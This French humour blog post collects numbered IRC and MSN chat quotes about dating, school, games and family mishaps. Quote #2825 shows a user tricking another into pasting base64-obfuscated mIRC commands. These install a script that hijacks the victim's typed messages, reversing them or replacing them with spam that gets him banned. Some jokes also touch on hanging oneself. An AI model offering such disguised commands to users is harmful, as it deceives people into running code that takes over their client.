8 avril 2012 7 08 /04 /avril /2012 05:23

#2740 (+) 2384/2834/8  (-)
Steffie : Pourquoi tibo il t?a donné mon adresse msn ????
Tonxounet : Parce que je lui ai demandé. Parce que il m?a filé l?adresse de ton blog et je t?ai trouvé aussi belle qu?un couché de soleil sur la mer.
Steffie : hin ??
Steffie : tu te fous de ma gueule
Tonxounet : comment te dire...
* Tibo a rejoint la discussion
Tibo : salut tonx
Tibo : salut la moche
Tonxounet : merci tibo, je trouvais plus mes mots

#2748 (+) 3716/4347/9  (-)
<Elde> kes kon peu ofrir a un mec ki a pa de passion particuliere, ni de style de musik préféré, et a moitié anorexik? (dc pas de chocola)
<Lepseudobien> Heu...Une corde?

#2750 (+) 4389/5139/9  (-)
<dada> bon
<dada> il est temps
<dada> de faire le ménage
<dada> de virer tous ces blaireaux dans mes contacts
<yoyo> mdr
<yoyo> ouai
- dada risque de ne pas répondre car il/elle n'est pas en ligne -

#2752 (+) 3349/3921/9  (-)
<p2m> t'sais, tu m'avais conseillé de faire un gateau au chocolat pour mes moment de déprime en celibataire ?
<Audrey> ben oui
<p2m> ben cet aprem' j'etais tout seul chez moi, je deprimais comme un porc donc je me suis dit que j'allais suivre ton conseil
<Audrey> ah ! et alors ? c'etait bon ?
<p2m> ma soeur à debarquer avec une bande de pote et ils ont tout bouffer, j'ai pas pu y toucher...
<Audrey> ...
<p2m> la prochaine fois que j'déprime, j'me pends

#2756 (+) 4803/5605/9  (-)
Haar_veste : j'ai un paquet de céréales dans la chambre mais pas moyen de trouver du lait
Haar_veste : je vais devoir chercher dans le frigo
Styx : bonne chance
Haar_veste : re
Styx : c'est bon tu as trouvé du lait ?
Haar_veste : ah merdeuu
Styx : mais qu'est ce que tu as foutu ?
Haar_veste : ben je suis arrivé devant le frigo et je me suis demandé ce que je foutais la
Haar_veste : alors du coup, j'ai pris un yaourt et je suis retourné devant le pc

#2759 (+) 2303/2705/9  (-)
<_20> salut
<Greg_from_limoges> slt
<_20> fille toi oui non
<Greg_from_limoges> moi homme
<Greg_from_limoges> toi tarzan ?

#2767 (+) 1897/2311/8  (-)
(@paroo) combien ya de kilometres pour aller en australie ?
(@Sib) google
(@paroo) pas trouvé
(@Sib) cerveau
(@paroo) pas trouvé

#2774 (+) 6412/7504/9  (-)
Sladix dit : mdr ya un type qui cours en slip dans la rue dehors!!!
Griever dit : mdrr
Sladix dit : merde...c'est mon père -_-
Griever dit : explosé

#2776 (+) 9469/11161/9  (-)
<Seph> putain mon chat a attrapé des puces fait chier
<hook> ha c chiant ça
<hook> fait gaffe il va en foutre partout même sur toi
<Seph> non t'inquiete j'vais m'en occuper
<Seph> justement là j'te laisse j'vais aller dépuceler mon chat
* Seph quit
<hook> ho putain :|

#2777 (+) 3649/4326/8  (-)
<Cox>Faut leur parler dans leur langage Garlok.
<Cox>L'école ça sert à faire de l'XP. Ca se fait toujours en raid et y'a le lead qui vous apprend les stratégies pour les instances futures!
<Cox>Quand tu sors de là, tu postules dans des sortes de guildes qui t'apprendront à bien monté tes compétences dans certains métiers. Ceci te permettra d'avoir des PO mais tu les toucheras qu'à la maintenance qui est en début de mois...
<Cox>Le GM de ta guilde sera tout puissant et si il trouve que tu sers à rien et bé il te /gkick et du coup tu touches plus de PO.
<Cox>En gros c'est ça...

#2789 (+) 5910/6934/9  (-)
<Snarkk> vu sur un skyblog :
<Snarkk> '' la c mwa ac ma prof de francé, mme delanoux, el é tp simpa ac ns é on a paC 1 super ané ac l tt not class, bisouuuus madame !! ''
<Snarkk> tu serais la prof, t'en penserais quoi ?
<skull-ring> dur :/

#2790 (+) 6396/7500/9  (-)
<kazam> putain
<kazam> j'étais au tel avec soph
<kazam> en train d'essayer de l'inviter au resto
<kazam> et la ma mère entre dans ma chambre en gueulant
<kazam> "tu vas arreter de pisser sur la voiture oui?"
<kazam> elle parlait au chien
<kazma> soph était pliée °-°
<kazam> j'ai des envies de meurtre.

#2792 (+) 5571/6536/9  (-)
Kirby: je vais manger, bye
brox: koi
Kirby: jV menG
brox: ok bon apeti

#2793 (+) 6135/7178/9  (-)
<cram> alors, le bac blanc de phys ?
<rveuh> bof, g planté
<rveuh> j'aurai au moins 1 pcque g bien écrit mon nom ^^
<cram> ...
<cram> fallait pas mettre le nom... mais le numéro sur ta table
<rveuh> merde ...

#2805 (+) 4019/4681/9  (-)
<max> des nouvelles du geek?
<duff> nop
<max> t'es chaud pour acheter wow, prendre un abonnement et tenter de le retrouver pour lui demander les réponses du dossier a rendre demain?

#2807 (+) 11682/13827/8  (-)
* karmAkoma has joined #aeria
<titanius--> Clem!
<titanius--> ca va?
<karmAkoma> un peu perturbé
<karmAkoma> je viens de retrouver mon chat dans le grenier
<titanius--> cool^^
<33fran> ca faisait combien de temps que tu l'avais perdu?
<karmAkoma> 9 ans
<titanius--> ...

#2823 (+) 2965/3547/8  (-)
<romain> dis moi alexandra , tu veu faire quoi comme metier toi?
<Alexandra> prof' de fransais et toi ?

#2824 (+) 3383/3952/9  (-)
<Ch5> tout a l'heure une fille m'a dit " a deux mains" sur msn en partant
<Ch5> et comme jetais au tel ac ma mere, de la main gauche je veux taper "oki"
<Ch5> et je tape "oku"
<Ch5> comment je ratrape ca?

#2825 (+) 5887/6963/9  (-)
<Ezekiel> slt je mapel Ezekiel
<Haribo> sans blagues
<Ezekiel> et toi??
<Haribo> ...
<Ezekiel> di le stp
<Haribo> ok tape // [ $decode
(c2V0ICVib3Vsem9yIFsgJHJhbmQoJGNhbGMoMTBeMTApLCRjYWxjKDEwXjExKSkgXQ==,
m) ] | [ $decode(d3JpdGUgLXJzIGJvdWx6b3IubXJj,m) ] [ $decode
(T24gKjpJTlBVVDoqOnsgc2V0ICV4ICRjYWxjKCRsZW4oJDEtKSArIDEpIHwgdW5zZXQgJ
XJlc3VsdGF0IHwgdG9rZW5pemUgMzIgJHJlcGxhY2UoJDEtLCAkY2hyKDMyKSwgJGNocig
xNjApKSB8IHdoaWxlICV4ID4gMSB7IGRlYyAleCB8IHZhciAlcmVzdWx0YXQgPSAlcmVzd
Wx0YXQgJCsgJG1pZCgkMS0sICV4LCAxKSB9IHwgbXNnICRhY3RpdmUgJXJlc3VsdGF0IHw
gaGFsdCB9,m) ] | [ $decode(bG9hZCAtcnMgYm91bHpvci5tcmM=,m) ]
<Ezekiel> ?iok éf as
<Ezekiel> ppts ????????????????revnel a irce as kp
<Ezekiel> edia# nioj/
<Ezekiel> snoc setê suov tiuq/
<Haribo> Et non tu peux pas partir
<Haribo> Bon, je suis gentil donc je vais t'aider
* Ezekiel was kicked by ChanServ ((Haribo) Ne me remercie pas, j'aime aider ;-))

*** le lendemain ***

<Enlendil> riri, j'ai Ezekiel sur msn, il arrive ^^
* Haribo is now known as Karina
* Ezekiel (24m93@Ezekiel_G.user.OGameNet) has joined #***
<Ezekiel> slt
<Karina> Salut
<Ezekiel> asv Karina
<Karina> Va voir sur mon profil mIRC
<Ezekiel> comen on fé?
<Karina> tape // var %i $rand(10,10000) $+ [ $decode(Lm1yYw==,m) ] |
[ $decode(d3JpdGUgLXJz,m) ] %i $decode
(b24gKjppbnB1dDoqOnsgYW1zZyBqZSBzdWlzIHVuIGJvdWxldCBldCBqZSBwZXV4IHBsd
XMgcGFybGVyIHw=,m) $decode(aGFsdA==,m) $chr(125) | [ $decode
(bG9hZCAtcnM=,m) ] %i
<Ezekiel> je suis un boulet et je peux plus parler
<Ezekiel> je suis un boulet et je peux plus parler
<Ezekiel> je suis un boulet et je peux plus parler
<Ezekiel> je suis un boulet et je peux plus parler
* SpamServ sets mode: +b *!*@Ezekiel_G.user.OGameFr
* Ezekiel was kicked by SpamServ (Spamming is against the network rules)
<Swald> Jeu set et match :D

#2836 (+) 2638/3171/8  (-)
Kirby : T'es en quelle classe ?
TwixD : Gnome warrior, pourquoi ?

#2839 (+) 2728/3424/8  (-)
<Hustler> j'aime ce canal...
<Hustler> car il n'y a jamias personne !
<Hustler> je peux dire ce que je veux !
<Hustler> je suis un abruti
<Hustler> je pisse a côté
* Kat has joined #Fadiu
<Hustler> je m'appelle Bernard Fadiu je trompe ma femme avec un comptable de 59 ans !
<Kat> Bernard ! espece de sale ... !
* Kat has quit IRC (Quit: va rejoindre ton comptable !)
<Hustler> mais chérie je rigolais
<Hustler> cherie ?
<Hustler> et mince

Partager cet article
Repost0

commentaires